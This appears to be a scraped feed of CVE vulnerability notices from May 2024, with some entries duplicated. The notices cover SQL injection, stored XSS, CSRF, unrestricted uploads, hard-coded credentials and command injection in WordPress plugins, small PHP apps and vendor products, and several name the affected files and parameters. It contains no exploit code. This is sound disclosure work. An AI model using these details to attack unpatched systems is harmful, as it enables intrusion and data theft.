🚨 CVE-2024-34808Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Samuel Marshall JCH Optimize.This issue affects JCH Optimize: from n/a through 4.2.0.🎖@cveNotify |
|
| 2024-05-16 16:37:30 |
🚨 CVE-2024-34805Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Webvitaly iFrame allows Stored XSS.This issue affects iFrame: from n/a through 5.0.🎖@cveNotify |
|
| 2024-05-16 16:37:27 |
🚨 CVE-2024-34760Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in WPBlockart Magazine Blocks allows Stored XSS.This issue affects Magazine Blocks: from n/a through 1.3.6.🎖@cveNotify |
|
| 2024-05-16 16:37:26 |
🚨 CVE-2024-34273njwt up to v0.4.0 was discovered to contain a prototype pollution in the Parser.prototype.parse method.🎖@cveNotify |
|
| 2024-05-16 16:37:25 |
🚨 CVE-2023-48643Shrubbery tac_plus 2.x, 3.x. and 4.x through F4.0.4.28 allows unauthenticated Remote Command Execution. The product allows users to configure authorization checks as shell commands through the tac_plus.cfg configuration file. These are executed when a client sends an authorization request with a username that has pre-authorization directives configured. However, it is possible to inject additional commands into these checks because strings from TACACS+ packets are used as command-line arguments. If the installation lacks a a pre-shared secret (there is no pre-shared secret by default), then the injection can be triggered without authentication. (The attacker needs to know a username configured to use a pre-authorization command.) NOTE: this is related to CVE-2023-45239 but the issue is in the original Shrubbery product, not Meta's fork.🎖@cveNotify |
|
| 2024-05-16 16:37:24 |
🚨 CVE-2024-4966A vulnerability was found in SourceCodester SchoolWebTech 1.0. It has been classified as critical. Affected is an unknown function of the file /improve/home.php. The manipulation of the argument image leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-264534 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-05-16 16:07:45 |
🚨 CVE-2024-35039idccms V1.35 was discovered to contain a Cross-Site Request Forgery (CSRF) via admin/tplSys_deal.php?mudi=area.🎖@cveNotify |
|
| 2024-05-16 16:07:42 |
🚨 CVE-2024-34958idccms v1.35 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component admin/banner_deal.php?mudi=add🎖@cveNotify |
|
| 2024-05-16 16:07:41 |
🚨 CVE-2024-34905FlyFish v3.0.0 was discovered to contain a buffer overflow via the password parameter on the login page. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted input.🎖@cveNotify |
|
| 2024-05-16 16:07:40 |
🚨 CVE-2024-34582Sunhillo SureLine through 8.10.0 on RICI 5000 devices allows cgi/usrPasswd.cgi userid_change XSS within the Forgot Password feature.🎖@cveNotify |
|
| 2024-05-16 16:07:39 |
🚨 CVE-2024-31142Because of a logical error in XSA-407 (Branch Type Confusion), themitigation is not applied properly when it is intended to be used.XSA-434 (Speculative Return Stack Overflow) uses the sameinfrastructure, so is equally impacted.For more details, see: https://xenbits.xen.org/xsa/advisory-407.html https://xenbits.xen.org/xsa/advisory-434.html🎖@cveNotify |
|
| 2024-05-16 16:07:35 |
🚨 CVE-2024-20326A vulnerability in the ConfD CLI and the Cisco Crosswork Network Services Orchestrator CLI could allow an authenticated, low-privileged, local attacker to read and write arbitrary files as root on the underlying operating system.This vulnerability is due to improper authorization enforcement when specific CLI commands are used. An attacker could exploit this vulnerability by executing an affected CLI command with crafted arguments. A successful exploit could allow the attacker to read or write arbitrary files on the underlying operating system with the privileges of the root user.🎖@cveNotify |
|
| 2024-05-16 16:07:34 |
🚨 CVE-2024-4999A vulnerability in the web-based management interface of multiple Ligowave devices could allow an authenticated remote attacker to execute arbitrary commands with elevated privileges.This issue affects UNITY: through 6.95-2; PRO: through 6.95-1.Rt3883; MIMO: through 6.95-1.Rt2880; APC Propeller: through 2-5.95-4.Rt3352.🎖@cveNotify |
|
| 2024-05-16 16:07:33 |
🚨 CVE-2024-4760A voltage glitch during the startup of EEFC NVM controllers on Microchip SAM E70/S70/V70/V71 microcontrollers allows access to the memory bus via the debug interface even if the security bit is set.🎖@cveNotify |
|
| 2024-05-16 15:37:27 |
🚨 CVE-2024-35039idccms V1.35 was discovered to contain a Cross-Site Request Forgery (CSRF) via admin/tplSys_deal.php?mudi=area.🎖@cveNotify |
|
| 2024-05-16 15:37:26 |
🚨 CVE-2024-34958idccms v1.35 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component admin/banner_deal.php?mudi=add🎖@cveNotify |
|
| 2024-05-16 15:37:25 |
🚨 CVE-2024-34582Sunhillo SureLine through 8.10.0 on RICI 5000 devices allows cgi/usrPasswd.cgi userid_change XSS within the Forgot Password feature.🎖@cveNotify |
|
| 2024-05-16 13:07:57 |
🚨 CVE-2024-4910A vulnerability was found in Campcodes Complete Web-Based School Management System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /view/student_exam_mark_insert_form1.php. The manipulation of the argument grade leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-264445 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-05-16 13:07:56 |
🚨 CVE-2024-34913An arbitrary file upload vulnerability in r-pan-scaffolding v5.0 and below allows attackers to execute arbitrary code via uploading a crafted PDF file.🎖@cveNotify |
|
| 2024-05-16 13:07:55 |
🚨 CVE-2024-34906An arbitrary file upload vulnerability in dootask v0.30.13 allows attackers to execute arbitrary code via uploading a crafted PDF file.🎖@cveNotify |
|
| 2024-05-16 13:07:51 |
🚨 CVE-2024-33625CyberPower PowerPanel business application code contains a hard-coded JWT signing key. This could result in an attacker forging JWT tokens to bypass authentication.🎖@cveNotify |
|
| 2024-05-16 13:07:50 |
🚨 CVE-2024-32053Hard-coded credentials are used by the CyberPower PowerPanel platform to authenticate to the database, other services, and the cloud. This could result in an attacker gaining access to services with the privileges of a Powerpanel business application.🎖@cveNotify |
|
| 2024-05-16 13:07:49 |
🚨 CVE-2024-32047Hard-coded credentials for the CyberPower PowerPanel test server can be found in the production code. This might result in an attacker gaining access to the testing or production server.🎖@cveNotify |
|
| 2024-05-16 13:07:45 |
🚨 CVE-2024-31410The devices which CyberPower PowerPanel manages use identical certificates based on a hard-coded cryptographic key. This can allow an attacker to impersonate any client in the system and send malicious data.🎖@cveNotify |
|
| 2024-05-16 13:07:44 |
🚨 CVE-2023-40297Stakater Forecastle 1.0.139 and before allows %5C../ directory traversal in the website component.🎖@cveNotify |
|
| 2024-05-16 13:07:40 |
🚨 CVE-2024-4909A vulnerability was found in Campcodes Complete Web-Based School Management System 1.0. It has been classified as critical. Affected is an unknown function of the file /view/student_due_payment.php. The manipulation of the argument due_year leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-264444.🎖@cveNotify |
|
| 2024-05-16 13:07:39 |
🚨 CVE-2024-4907A vulnerability has been found in Campcodes Complete Web-Based School Management System 1.0 and classified as critical. This vulnerability affects unknown code of the file /view/show_student2.php. The manipulation of the argument grade leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-264442 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-05-16 13:07:38 |
🚨 CVE-2024-35102Insecure Permissions vulnerability in VITEC AvediaServer (Model avsrv-m8105) 8.6.2-1 allows a remote attacker to escalate privileges via a crafted script.🎖@cveNotify |
|
| 2024-05-16 11:37:35 |
🚨 CVE-2024-4838The ConvertPlus plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 3.5.26 via deserialization of untrusted input from the 'settings_encoded' attribute of the 'smile_modal' shortcode. This makes it possible for authenticated attackers, with contributor-level access and above, to inject a PHP Object. No POP chain is present in the vulnerable plugin. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.🎖@cveNotify |
|
| 2024-05-16 11:37:34 |
🚨 CVE-2024-4400The Post and Page Builder by BoldGrid – Visual Drag and Drop Editor plguin for WordPress is vulnerable to Stored Cross-Site Scripting via an unknown parameter in versions up to, and including, 1.26.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-05-16 11:37:33 |
🚨 CVE-2024-4385The Envo Extra plugin for WordPress is vulnerable to Stored Cross-Site Scripting via multiple parameters in versions up to, and including, 1.8.16 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-05-16 11:37:30 |
🚨 CVE-2024-4288The Appointment Booking Calendar — Simply Schedule Appointments Booking Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘link’ parameter in versions up to, and including, 1.6.7.14 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-05-16 11:37:29 |
🚨 CVE-2024-35301In JetBrains TeamCity before 2024.03.1 commit status publisher didn't check project scope of the GitHub App token🎖@cveNotify |
|
| 2024-05-16 11:37:28 |
🚨 CVE-2024-35299In JetBrains YouTrack before 2024.1.29548 the SMTPS protocol communication lacked proper certificate hostname validation🎖@cveNotify |
|
| 2024-05-16 10:37:56 |
🚨 CVE-2024-4975A vulnerability, which was classified as problematic, has been found in code-projects Simple Chat System 1.0. This issue affects some unknown processing of the component Message Handler. The manipulation leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-264539.🎖@cveNotify |
|
| 2024-05-16 10:37:52 |
🚨 CVE-2024-4973A vulnerability classified as critical was found in code-projects Simple Chat System 1.0. This vulnerability affects unknown code of the file /register.php. The manipulation of the argument name/number/address leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-264538 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-05-16 10:37:51 |
🚨 CVE-2024-4351The Tutor LMS Pro plugin for WordPress is vulnerable to unauthorized access of data, modification of data, loss of data due to a missing capability check on the 'authenticate' function in all versions up to, and including, 2.7.0. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to gain control of an existing administrator account.🎖@cveNotify |
|
| 2024-05-16 10:37:50 |
🚨 CVE-2024-4222The Tutor LMS Pro plugin for WordPress is vulnerable to unauthorized access of data, modification of data, loss of data due to a missing capability check on multiple functions in all versions up to, and including, 2.7.0. This makes it possible for unauthenticated attackers to add, modify, or delete user meta and plugin options.🎖@cveNotify |
|
| 2024-05-16 08:37:26 |
🚨 CVE-2024-4965** UNSUPPORTED WHEN ASSIGNED ** A vulnerability was found in D-Link DAR-7000-40 V31R02B1413C and classified as critical. This issue affects some unknown processing of the file /useratte/resmanage.php. The manipulation of the argument load leads to os command injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-264533 was assigned to this vulnerability. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced.🎖@cveNotify |
|
| 2024-05-16 08:37:25 |
🚨 CVE-2024-4546The Custom Post Type Attachment plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'pdf_attachment' shortcode in all versions up to, and including, 3.4.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-05-16 08:37:24 |
🚨 CVE-2024-4478The Happy Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Image Stack Group widget in all versions up to, and including, 3.10.7 due to insufficient input sanitization and output escaping on user supplied 'tooltip_position' attribute. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-05-16 07:37:25 |
🚨 CVE-2024-4962** UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as critical, has been found in D-Link DAR-7000-40 V31R02B1413C. Affected by this issue is some unknown functionality of the file /useratte/resmanage.php. The manipulation of the argument file leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-264530 is the identifier assigned to this vulnerability. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced.🎖@cveNotify |
|
| 2024-05-16 07:37:24 |
🚨 CVE-2024-4844Hardcoded credentials vulnerability in Trellix ePolicy Orchestrator (ePO) on Premise prior to 5.10 Service Pack 1 Update 2 allows an attacker with admin privileges on the ePO server to read the contents of the orion.keystore file, allowing them to access the ePO database encryption key. This was possible through using a hard coded password for the keystore. Access Control restrictions on the file mean this would not be exploitable unless the user is the system admin for the server that ePO is running on.🎖@cveNotify |
|
| 2024-05-16 06:37:35 |
🚨 CVE-2024-4961** UNSUPPORTED WHEN ASSIGNED ** A vulnerability classified as critical was found in D-Link DAR-7000-40 V31R02B1413C. Affected by this vulnerability is an unknown functionality of the file /user/onlineuser.php. The manipulation of the argument file_upload leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-264529 was assigned to this vulnerability. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced.🎖@cveNotify |
|
| 2024-05-16 06:37:32 |
🚨 CVE-2024-4960** UNSUPPORTED WHEN ASSIGNED ** A vulnerability classified as critical has been found in D-Link DAR-7000-40 V31R02B1413C. Affected is an unknown function of the file interface/sysmanage/licenseauthorization.php. The manipulation of the argument file_upload leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-264528. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced.🎖@cveNotify |
|
| 2024-05-16 06:37:31 |
🚨 CVE-2024-4843ePO doesn't allow a regular privileged user to delete tasks or assignments. Insecure direct object references that allow a least privileged user to manipulate the client task and client task assignments, hence escalating his/her privilege.🎖@cveNotify |
|
| 2024-05-16 06:37:30 |
🚨 CVE-2024-4318The Tutor LMS plugin for WordPress is vulnerable to time-based SQL Injection via the ‘question_id’ parameter in versions up to, and including, 2.7.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Instructor-level permissions and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.🎖@cveNotify |
|
| 2024-05-16 06:37:26 |
🚨 CVE-2024-3644The Newsletter Popup WordPress plugin through 1.2 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)🎖@cveNotify |
|
| 2024-05-16 06:37:25 |
🚨 CVE-2024-3642The Newsletter Popup WordPress plugin through 1.2 does not have CSRF check when deleting subscriber, which could allow attackers to make logged in admins perform such action via a CSRF attack🎖@cveNotify |
|
| 2024-05-16 06:37:24 |
🚨 CVE-2024-3641The Newsletter Popup WordPress plugin through 1.2 does not sanitise and escape some parameters, which could allow unauthenticated visitors to perform Cross-Site Scripting attacks against admins🎖@cveNotify |
|
| 2024-05-16 05:37:26 |
🚨 CVE-2024-4945A vulnerability was found in SourceCodester Best Courier Management System 1.0. It has been classified as problematic. Affected is an unknown function of the file view_parcel.php. The manipulation of the argument id leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-264480.🎖@cveNotify |
|
| 2024-05-16 05:37:25 |
🚨 CVE-2024-4932A vulnerability, which was classified as critical, was found in SourceCodester Simple Online Bidding System 1.0. Affected is an unknown function of the file /simple-online-bidding-system/admin/index.php?page=manage_user. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-264468.🎖@cveNotify |
|
| 2024-05-16 05:37:24 |
🚨 CVE-2024-4931A vulnerability, which was classified as critical, has been found in SourceCodester Simple Online Bidding System 1.0. This issue affects some unknown processing of the file /simple-online-bidding-system/admin/index.php?page=view_udet. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-264467.🎖@cveNotify |
|
| 2024-05-16 04:37:34 |
🚨 CVE-2024-4929A vulnerability classified as problematic has been found in SourceCodester Simple Online Bidding System 1.0. This affects an unknown part of the file /simple-online-bidding-system/admin/ajax.php?action=save_user. The manipulation leads to cross-site request forgery. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-264465 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-05-16 03:37:25 |
🚨 CVE-2024-4927A vulnerability was found in SourceCodester Simple Online Bidding System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /simple-online-bidding-system/admin/ajax.php?action=save_product. The manipulation leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-264463.🎖@cveNotify |
|
| 2024-05-16 03:37:24 |
🚨 CVE-2024-3750The Visualizer: Tables and Charts Manager for WordPress plugin for WordPress is vulnerable to unauthorized modification and retrieval of data due to a missing capability check on the getQueryData() function in all versions up to, and including, 3.10.15. This makes it possible for authenticated attackers, with subscriber-level access and above, to perform arbitrary SQL queries that can be leveraged for privilege escalation among many other actions.🎖@cveNotify |
|
| 2024-05-16 02:37:48 |
🚨 CVE-2024-4926A vulnerability was found in SourceCodester School Intramurals Student Attendance Management System 1.0. It has been classified as critical. Affected is an unknown function of the file /intrams_sams/manage_student.php. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-264462 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-05-16 02:37:47 |
🚨 CVE-2024-4923A vulnerability has been found in Codezips E-Commerce Site 1.0 and classified as critical. This vulnerability affects unknown code of the file admin/addproduct.php. The manipulation of the argument profilepic leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-264460.🎖@cveNotify |
|
| 2024-05-16 01:37:25 |
🚨 CVE-2024-4922A vulnerability, which was classified as problematic, was found in SourceCodester Simple Image Stack Website 1.0. This affects an unknown part. The manipulation of the argument page leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-264459.🎖@cveNotify |
|
| 2024-05-16 01:37:24 |
🚨 CVE-2024-27268IBM WebSphere Application Server Liberty 18.0.0.2 through 24.0.0.4 is vulnerable to a denial of service, caused by sending a specially crafted request. A remote attacker could exploit this vulnerability to cause the server to consume memory resources. IBM X-Force ID: 284574.🎖@cveNotify |
|
| 2024-05-16 01:07:42 |
🚨 CVE-2024-23222A type confusion issue was addressed with improved checks. This issue is fixed in iOS 17.3 and iPadOS 17.3, macOS Sonoma 14.3, tvOS 17.3. Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been exploited.🎖@cveNotify |
|
| 2024-05-16 01:07:38 |
🚨 CVE-2021-30666A buffer overflow issue was addressed with improved memory handling. This issue is fixed in iOS 12.5.3. Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited..🎖@cveNotify |
|
| 2024-05-16 01:07:37 |
🚨 CVE-2021-30663An integer overflow was addressed with improved input validation. This issue is fixed in iOS 14.5.1 and iPadOS 14.5.1, tvOS 14.6, iOS 12.5.3, Safari 14.1.1, macOS Big Sur 11.3.1. Processing maliciously crafted web content may lead to arbitrary code execution.🎖@cveNotify |
|
| 2024-05-16 01:07:36 |
🚨 CVE-2021-30661A use after free issue was addressed with improved memory management. This issue is fixed in Safari 14.1, iOS 12.5.3, iOS 14.5 and iPadOS 14.5, watchOS 7.4, tvOS 14.5, macOS Big Sur 11.3. Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited..🎖@cveNotify |
|
| 2024-05-16 01:07:33 |
🚨 CVE-2021-30762A use after free issue was addressed with improved memory management. This issue is fixed in iOS 12.5.4. Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited..🎖@cveNotify |
|
| 2024-05-16 01:07:32 |
🚨 CVE-2021-1871A logic issue was addressed with improved restrictions. This issue is fixed in macOS Big Sur 11.2, Security Update 2021-001 Catalina, Security Update 2021-001 Mojave, iOS 14.4 and iPadOS 14.4. A remote attacker may be able to cause arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited..🎖@cveNotify |
|
| 2024-05-16 01:07:31 |
🚨 CVE-2021-1870A logic issue was addressed with improved restrictions. This issue is fixed in macOS Big Sur 11.2, Security Update 2021-001 Catalina, Security Update 2021-001 Mojave, iOS 14.4 and iPadOS 14.4. A remote attacker may be able to cause arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited..🎖@cveNotify |
|
| 2024-05-16 00:37:25 |
🚨 CVE-2024-22353IBM WebSphere Application Server Liberty 17.0.0.3 through 24.0.0.4 is vulnerable to a denial of service, caused by sending a specially crafted request. A remote attacker could exploit this vulnerability to cause the server to consume memory resources. IBM X-Force ID: 280400.🎖@cveNotify |
|
| 2024-05-15 23:37:25 |
🚨 CVE-2024-4917A vulnerability was found in Campcodes Online Examination System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file submitAnswerExe.php. The manipulation of the argument exmne_id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-264452.🎖@cveNotify |
|
| 2024-05-15 23:37:24 |
🚨 CVE-2024-4916A vulnerability has been found in Campcodes Online Examination System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file selExamAttemptExe.php. The manipulation of the argument thisId leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-264451.🎖@cveNotify |
|
| 2024-05-15 22:37:24 |
🚨 CVE-2020-29312An issue found in Zend Framework v.3.1.3 and before allow a remote attacker to execute arbitrary code via the unserialize function. Note: This has been disputed by third parties as incomplete and incorrect. The framework does not have a version that surpasses 2.x.x and was deprecated in early 2020.🎖@cveNotify |
|
| 2024-05-15 21:37:32 |
🚨 CVE-2024-4976Out-of-bounds array write in Xpdf 4.05 and earlier, due to missing object type check in AcroForm field reference.🎖@cveNotify |
|
| 2024-05-15 21:37:31 |
🚨 CVE-2024-4948Use after free in Dawn in Google Chrome prior to 125.0.6422.60 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2024-05-15 21:37:30 |
🚨 CVE-2024-4947Type Confusion in V8 in Google Chrome prior to 125.0.6422.60 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2024-05-15 21:37:26 |
🚨 CVE-2024-4912A vulnerability classified as critical has been found in Campcodes Online Examination System 1.0. This affects an unknown part of the file addExamExe.php. The manipulation of the argument examTitle leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-264447.🎖@cveNotify |
|
| 2024-05-15 21:37:25 |
🚨 CVE-2024-27244Insufficient verification of data authenticity in the installer for Zoom Workplace VDI App for Windows may allow an authenticated user to conduct an escalation of privilege via local access.🎖@cveNotify |
|
| 2024-05-15 21:37:24 |
🚨 CVE-2024-27243Buffer overflow in some Zoom Workplace Apps and SDK’s may allow an authenticated user to conduct a denial of service via network access.🎖@cveNotify |
|
| 2024-05-15 20:37:40 |
🚨 CVE-2024-4910A vulnerability was found in Campcodes Complete Web-Based School Management System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /view/student_exam_mark_insert_form1.php. The manipulation of the argument grade leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-264445 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-05-15 20:37:36 |
🚨 CVE-2024-34909An arbitrary file upload vulnerability in KYKMS v1.0.1 and below allows attackers to execute arbitrary code via uploading a crafted PDF file.🎖@cveNotify |
|
| 2024-05-15 20:37:35 |
🚨 CVE-2024-34025CyberPower PowerPanel business application code contains a hard-coded set of authentication credentials. This could result in an attacker bypassing authentication and gaining administrator privileges.🎖@cveNotify |
|
| 2024-05-15 20:37:31 |
🚨 CVE-2024-33615A specially crafted Zip file containing path traversal characters can be imported to the CyberPower PowerPanel server, which allows file writing to the server outside the intended scope, and could allow an attacker to achieve remote code execution.🎖@cveNotify |
|
| 2024-05-15 20:37:30 |
🚨 CVE-2024-32042The key used to encrypt passwords stored in the database can be found in the CyberPower PowerPanelapplication code, allowing the passwords to be recovered.🎖@cveNotify |
|
| 2024-05-15 20:37:26 |
🚨 CVE-2024-31410The devices which CyberPower PowerPanel manages use identical certificates based on a hard-coded cryptographic key. This can allow an attacker to impersonate any client in the system and send malicious data.🎖@cveNotify |
|
| 2024-05-15 20:37:25 |
🚨 CVE-2023-40297Stakater Forecastle 1.0.139 and before allows %5C../ directory traversal in the website component.🎖@cveNotify |
|
| 2024-05-15 20:37:24 |
🚨 CVE-2024-30055Microsoft Edge (Chromium-based) Spoofing Vulnerability🎖@cveNotify |
|
| 2024-05-15 19:37:30 |
🚨 CVE-2024-4909A vulnerability was found in Campcodes Complete Web-Based School Management System 1.0. It has been classified as critical. Affected is an unknown function of the file /view/student_due_payment.php. The manipulation of the argument due_year leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-264444.🎖@cveNotify |
|
| 2024-05-15 19:37:26 |
🚨 CVE-2024-4907A vulnerability has been found in Campcodes Complete Web-Based School Management System 1.0 and classified as critical. This vulnerability affects unknown code of the file /view/show_student2.php. The manipulation of the argument grade leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-264442 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-05-15 19:37:25 |
🚨 CVE-2024-35102Insecure Permissions vulnerability in VITEC AvediaServer (Model avsrv-m8105) 8.6.2-1 allows a remote attacker to escalate privileges via a crafted script.🎖@cveNotify |
|
| 2024-05-15 19:37:24 |
🚨 CVE-2024-20383A vulnerability in the Cisco Crosswork NSO CLI and the ConfD CLI could allow an authenticated, low-privileged, local attacker to elevate privileges to root on the underlying operating system. The vulnerability is due to an incorrect privilege assignment when specific CLI commands are used. An attacker could exploit this vulnerability by executing an affected CLI command. A successful exploit could allow the attacker to elevate privileges to root on the underlying operating system.🎖@cveNotify |
|
| 2024-05-15 18:37:44 |
🚨 CVE-2024-4622If misconfigured, alpitronic Hypercharger EV charging devices can expose a web interface protected by authentication. If the default credentials are not changed, an attacker can use public knowledge to access the device as an administrator.🎖@cveNotify |
|
| 2024-05-15 18:37:43 |
🚨 CVE-2024-4200In Progress® Telerik® Reporting versions prior to 2024 Q2 (18.1.24.2.514), a code execution attack is possible by a local threat actor through an insecure deserialization vulnerability.🎖@cveNotify |
|
| 2024-05-15 18:37:42 |
🚨 CVE-2024-3970Server Side Request Forgery vulnerability has been discovered in OpenText™ iManager 3.2.6.0200. Thiscould lead to senstive information disclosure by directory traversal.🎖@cveNotify |
|
| 2024-05-15 18:37:38 |
🚨 CVE-2024-3967Remote CodeExecution has been discovered inOpenText™ iManager 3.2.6.0200. The vulnerability cantrigger remote code execution unisng unsafe java object deserialization.🎖@cveNotify |
|
| 2024-05-15 18:37:37 |
🚨 CVE-2024-3488File Upload vulnerability in unauthenticatedsession found in OpenText™ iManager 3.2.6.0200. The vulnerability could allow ant attacker to upload afile without authentication.🎖@cveNotify |
|
| 2024-05-15 18:37:36 |
🚨 CVE-2024-3487Broken Authentication vulnerability discovered in OpenText™ iManager 3.2.6.0200. Thisvulnerability allows an attacker to manipulate certain parameters to bypassauthentication.🎖@cveNotify |
|
| 2024-05-15 18:37:33 |
🚨 CVE-2024-3486XML External Entity injection vulnerability found in OpenText™ iManager 3.2.6.0200. This could lead to information disclosure and remote code execution.🎖@cveNotify |
|
| 2024-05-15 18:37:32 |
🚨 CVE-2024-3485Server Side Request Forgery vulnerability has been discovered in OpenText™ iManager 3.2.6.0200. Thiscould lead to senstive information disclosure.🎖@cveNotify |
|
| 2024-05-15 18:37:31 |
🚨 CVE-2024-3483Remote CodeExecution has been discovered inOpenText™ iManager 3.2.6.0200. The vulnerability cantrigger command injection and insecure deserialization issues.🎖@cveNotify |
|
| 2024-05-15 18:37:30 |
🚨 CVE-2024-34082Grav is a file-based Web platform. Prior to version 1.7.46, a low privilege user account with page edit privilege can read any server files using Twig Syntax. This includes Grav user account files - `/grav/user/accounts/*.yaml`. This file stores hashed user password, 2FA secret, and the password reset token. This can allow an adversary to compromise any registered account and read any file in the web server by resetting a password for a user to get access to the password reset token from the file or by cracking the hashed password. A low privileged user may also perform a full account takeover of other registered users including Administrators. Version 1.7.46 contains a patch.🎖@cveNotify |
|
| 2024-05-15 18:37:26 |
🚨 CVE-2024-28042SUBNET Solutions Inc. has identified vulnerabilities in third-party components used in PowerSYSTEM Center.🎖@cveNotify |
|
| 2024-05-15 18:37:25 |
🚨 CVE-2023-7258A denial of service exists in Gvisor Sandbox where a bug in reference counting code in mount point tracking could lead to a panic, making it possible for an attacker running as root and with permission to mount volumes to kill the sandbox. We recommend upgrading past commit 6a112c60a257dadac59962e0bc9e9b5aee70b5b6🎖@cveNotify |
|
| 2024-05-15 18:37:24 |
